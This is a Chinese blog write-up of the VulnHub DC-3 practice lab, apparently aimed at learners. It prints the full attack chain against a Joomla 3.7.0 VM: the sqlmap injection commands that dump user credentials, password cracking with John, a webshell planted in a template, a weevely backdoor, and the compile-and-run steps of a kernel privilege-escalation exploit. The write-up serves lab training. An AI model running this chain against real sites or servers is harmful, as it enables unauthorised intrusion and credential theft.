vulnhub系列靶机--DC3

最新推荐文章于 2024-01-08 21:32:29 发布
最新推荐文章于 2024-01-08 21:32:29 发布
阅读量442 收藏
点赞数
分类专栏: vulnhub靶机系列 文章标签: linux 数据库 mysql 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45949219/article/details/104455263
版权

vulnhub系列靶机–DC3

主机发现:

先主机发现找到靶机的ip

使用nmap

nmap -sP 192.168.211.0/24

netdiscover -r 192.168.211.1/24

在这里插入图片描述

根据MAC地址可以确定靶机的ip为192.168.211.136

然后扫描该ip所开放的端口服务

nmap -A 192.168.211.136 -p 1-65535
在这里插入图片描述
发现靶机只开放了80端口,访问但没有任何线索

在这里插入图片描述
使用Nikto扫描网站目录

在这里插入图片描述

发现了后台登陆界面http://192.168.211.136/administrator/

在这里插入图片描述

这时我们要对网站进行指纹识别

whatweb 192.168.211.136

在这里插入图片描述
发现网站框架是Joomla

然后我们可以使用joomscan扫描joomla网站

joomscan -u http://192.168.211.136

在这里插入图片描述

我们扫出了Joomla版本等信息

然后搜索Joomla3.7.0的漏洞 searchsploit Joomla 3.7.0

在这里插入图片描述
发现一个SQL注入漏洞

将漏洞信息保存到本地

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla_sql.txt

在这里插入图片描述
得到了注入点等信息
在这里插入图片描述
sqlmap -u “http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述
我们成功获取了数据库

–current-db获取当前数据库

在这里插入图片描述
-D “joomladb” --tables

获取该数据库下的表名

在这里插入图片描述

-D “joomladb” -T “#__users” --columns获取#_user 中的列名

在这里插入图片描述
-D “joomladb” -T “#__users” -C “name,password” --dump获取字段

在这里插入图片描述

然后将密码解密

先将密码写入一个文件里面,然后使用John解密

解密出密码是Snoopy

在这里插入图片描述
成功进入后台

在这里插入图片描述
发现可以查看源码

在这里插入图片描述
http://192.168.211.136/templates/beez3/html/2.php中写入一句话木马,然后使用蚁剑连接

在这里插入图片描述
模拟终端

在这里插入图片描述
反弹shell

weevely generate 123456 shell1.php

密码:123456

脚本文件名:shell.php

在这里插入图片描述
将脚本上传到网站上

在这里插入图片描述

kali上面连接

weevely http://192.168.211.136/templates/beez3/html/shell1.php 123456 成功获取shell
在这里插入图片描述
接下来提权

www-data用户,主机Ubuntu 16.04 内核 4.4.0-21

在kali里面搜索这个版本漏洞searchsploit Ubuntu 16.04

在这里插入图片描述

查看漏洞介绍

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu-1604-shell.txt

cat ubuntu-1604-shell.txt

在这里插入图片描述
下载exp,将里面的exploit.tar上传,并解压运行

在这里插入图片描述

unzip 39772.zip #解压29772.zip文件

cd 39772

tar -xvf exploit.tar #解压exploit提权脚本tar包

cd ebpf_mapfd_doubleput_exploit

在这里插入图片描述

编译代码

./compile.sh #执行脚本,编译文件

在这里插入图片描述
./doubleput #执行提权文件

在这里插入图片描述
获得root权限

信安学徒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透靶机不到ip地址
qq_63283137的博客
09-23 1679
原因一、没有开启nat模式原因二、虚拟网络编辑器错误原因三、靶机网卡配置错误。
Vulnhub系列DC3
大方子
04-08 5062
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
vulnhub-DC3
weixin_55129870的博客
05-15 475
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
vulnhubdc3
qq_54030686的博客
06-08 258
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 161
今天继续趁着回家来用DC练练手。照旧先是一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
VulnHub之DC-3
qq_45434762的博客
03-23 455
一个粗糙的信息收集通过端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
渗透测试Vulnhub-DC3
TenG的博客
07-09 243
Preface 光怪陆离都经历,山川湖海放心里 本篇为vulnhub系列DC3啦,距DC2这段时间发生了许许多多的事情,有好有坏,都过来了,这几天多了一个特别的人,是幸运吧哈哈哈。哈哈哈哈哈……开始前说点废话,练习过程中也是参考了许多大师傅们写的文章才完成了,在此记录一下,也非常希望师傅们能指正错误。 Process 老方法,先用nmap描一下,对师父们来说都是小意思,就不在挂图赘述啦,得到靶机IP以及只开放了80端口,那么直接访问web服务 可以看到直接就是登录页面,我是先用dirsearch
Vulnhub DC-3
Pai_Space
02-15 248
192.168.37.132 This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges. How you get to be root is up to you - and, obviously, the system. Good luck - and I hope you enjo...
VulnHub DC3
baynk的博客
05-16 274
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
VulnHub—DC-3
weixin_39219503的博客
01-30 1279
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-3,312/ 题目信息如下 Description DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. A...
Vulnhub DC-3靶机渗透测试(DC系列
Alexhirchi的博客
10-11 900
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 389
描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan一下啊 没事就更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
vulnhub靶场之DC-3
最新发布
qq_58091216的博客
01-08 966
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub靶机之dc-3
m0_52328368的博客
08-14 1270
dc-3靶机教程
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值